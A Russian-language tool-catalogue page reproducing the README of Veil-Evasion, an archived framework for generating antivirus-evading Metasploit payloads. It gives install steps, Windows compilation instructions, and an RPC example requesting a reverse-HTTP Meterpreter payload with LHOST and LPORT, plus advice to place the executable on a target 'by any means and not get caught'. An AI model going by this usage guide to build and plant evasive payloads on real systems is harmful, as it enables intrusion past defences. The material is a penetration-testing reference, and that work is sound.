Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Veil-Evasion — Veil Evasion больше не поддерживается, используйте Veil 3.0! | Kitploit
Инструменты/GitHubGitHub/veil-framework/veil-evasion
Фреймворки для эксплойтовГенерация полезной нагрузкиТестирование на ПроникновениеКомандование и УправлениеГенерация ШеллкодаArchived
GitHubveil-framework/veil-evasion

Veil-Evasion

Veil Evasion больше не поддерживается, используйте Veil 3.0!

Репозиторий
1.8k67564 лет назадПроверено Kitploit
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Veil-Evasion

Veil-Evasion — это инструмент, предназначенный для создания полезных нагрузок Metasploit, которые обходят распространённые антивирусные решения.

ПРИМЕЧАНИЕ: ./setup/setup.sh следует повторно запускать при каждом крупном обновлении версии. Если при запуске Veil-Evasion возникают серьёзные ошибки, сначала попробуйте повторно выполнить этот скрипт, чтобы установить дополнительные пакеты и обновить общий файл конфигурации.

Veil-Evasion в настоящее время активно поддерживается @ChrisTruncer, @TheMightyShiv, @HarmJ0y.

Благодарности:

  • @jasonjfrank
  • @mjmaley
  • @davidpmcguire

Требования к программному обеспечению:

Linux

  1. Используйте Kali (x86) — все зависимости уже предустановлены

или

  1. Установите Python 2.7
  2. Установите PyCrypto >= 2.3

Windows (для компиляции Py2Exe)

  1. Python (протестировано с x86 — http://www.python.org/download/releases/2.7/)
  2. Py2Exe (http://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/)
  • PyCrypto (http://www.voidspace.org.uk/python/modules.shtml)
  • PyWin32 (http://sourceforge.net/projects/pywin32/files/pywin32/Build%20218/pywin32-218.win32-py2.7.exe/download)
  • Установка (tl;dr)

    ПРИМЕЧАНИЕ: Установка должна выполняться с привилегиями суперпользователя. Если вы не используете Kali Linux, добавьте sudo перед каждой командой или переключитесь на пользователя root перед началом.

    Запустите setup.sh -c на Kali x86.

    Установите Python 2.7, Py2Exe, PyCrypto и PyWin32 на компьютер с Windows (для Py2Exe).

    Быстрая установка

    root@kitploit:~
    apt-get -y install git
    git clone https://github.com/Veil-Framework/Veil-Evasion.git
    cd Veil-Evasion/
    cd setup
    setup.sh -c
    

    Перегенерация конфигурации

    ПРИМЕЧАНИЕ: Это должно выполняться с привилегиями суперпользователя. Если вы не используете Kali Linux, добавьте sudo перед каждой командой или переключитесь на пользователя root перед началом.

    В большинстве случаев файл конфигурации /etc/veil/settings.py не нужно перестраивать, но в некоторых случаях может быть предложено это сделать. Файл генерируется скриптом config/update.py.

    Важно находиться в каталоге config/ перед выполнением update.py. Если вы находитесь в другом каталоге, settings.py будет создан некорректно, и при запуске Veil-Evasion вы увидите следующее.

    root@kitploit:~
        Main Menu
    
                0 payloads loaded
    

    Не паникуйте. Перейдите в каталог config/ и повторно запустите update.py.

    Описание

    Veil-Evasion разработан для работы на Kali Linux, но должен функционировать на любой системе, способной выполнять скрипты Python. Просто вызовите Veil-Evasion из командной строки и следуйте меню для создания полезной нагрузки. После создания полезной нагрузки Veil-Evasion спросит, хотите ли вы преобразовать файл полезной нагрузки в исполняемый файл с помощью Pyinstaller или Py2Exe.

    При использовании Pyinstaller Veil-Evasion преобразует вашу полезную нагрузку в исполняемый файл прямо в Kali.

    При использовании Py2Exe Veil-Evasion создаст три файла:

    • payload.py — файл полезной нагрузки
    • setup.py — необходимый файл для Py2Exe
    • runme.bat — пакетный скрипт для компиляции полезной нагрузки в исполняемый файл Windows

    Перенесите все три файла на компьютер с Windows, где установлен Python. Все три файла должны быть помещены в корень каталога, куда установлен Python (скорее всего, C:\Python27). Запустите пакетный скрипт, чтобы преобразовать скрипт Python в исполняемый формат.

    Разместите исполняемый файл на целевой машине любыми средствами и не попадитесь!

    RPC-сервер

    На стороне слушателя выполните:

    ./Veil-Evasion --rpc

    Это запустит слушатель на порту 4242.

    На стороне клиента вам потребуется запустить клиентскую программу. Это может быть пользовательский скрипт или что-то простое, например Netcat. RPC-сервер реализует JSON-RPC. Вот хорошая ссылка для интерпретации запросов и ответов JSON-RPC: http://json-rpc.org/wiki/specification

    Формат RPC-запроса следующий:

    root@kitploit:~
        method="version"            — возвращает текущий номер версии Veil-Evasion
        method="payloads"           — возвращает все загруженные полезные нагрузки
        method="payload_options"
            params="payload_name"   — возвращает параметры для указанной полезной нагрузки
        method="generate"
            params=["payload=X",   
                    "outputbase=Y"
                    "overwrite=Z",
                    "msfvenom=...",
                    "LHOST=blah]    — генерирует указанную полезную нагрузку с заданными параметрами и возвращает путь к сгенерированному исполняемому файлу
    

    Вот простой пример работы с Veil-Evasion через Netcat:

    root@kitploit:~
    root@kali:~# nc 127.0.0.1 4242
    {"method":"version","params":[],"id":0}
    

    И ответ сервера:

    root@kitploit:~
    {"id":0,"result":"2.21.4","error":null}
    
    

    Пример клиентской программы можно найти здесь: http://github.com/miligulmohar/python-symmetric-jsonrpc/blob/master/examples/client.py

    ПРИМЕЧАНИЕ: Порт для Veil-Evasion — 4242. Его необходимо изменить в client.py, чтобы он работал.

    Чтобы сгенерировать полезную нагрузку, необходимо указать ВСЕ параметры:

    • payload — какую полезную нагрузку генерировать
    • outputbase — имя для сохранения полезной нагрузки
    • LHOST — IP-адрес для прослушивающего хоста
    • LPORT — порт для прослушивающего хоста
    • pwnstaller — True для упаковки программ Python в исполняемый файл. False, если нет. Игнорируется для других полезных нагрузок

    Вот хорошая ссылка, чтобы понять, используется ли pwnstaller: http://www.verisgroup.com/blog/2014/05/07/pwnstaller-and-the-veil-framework/

    Пример генерации полезной нагрузки:

    root@kitploit:~
    root@kali:~# nc 127.0.0.1 4242
    {"method":"generate","params":["payload=c/meterpreter/rev_http","outputbase=payloadName","LHOST=192.168.1.11","LPORT=2121","pwnstaller=False"],"id":1"}
    

    И ответ сервера:

    root@kitploit:~
    {"id":8,"result":"/usr/share/veil-output/compiled/payloadName.exe","error":null}
    

    ПРИМЕЧАНИЕ: Если в запросе не указан id, Veil-Evasion завершит работу. Однако вы можете делать столько допустимых запросов, сколько захотите, пока Veil-Evasion не завершится.

    Чтобы завершить работу RPC-сервера, выполните:

    ./Veil-Evasion --rpcshutdown

    Скачать инструмент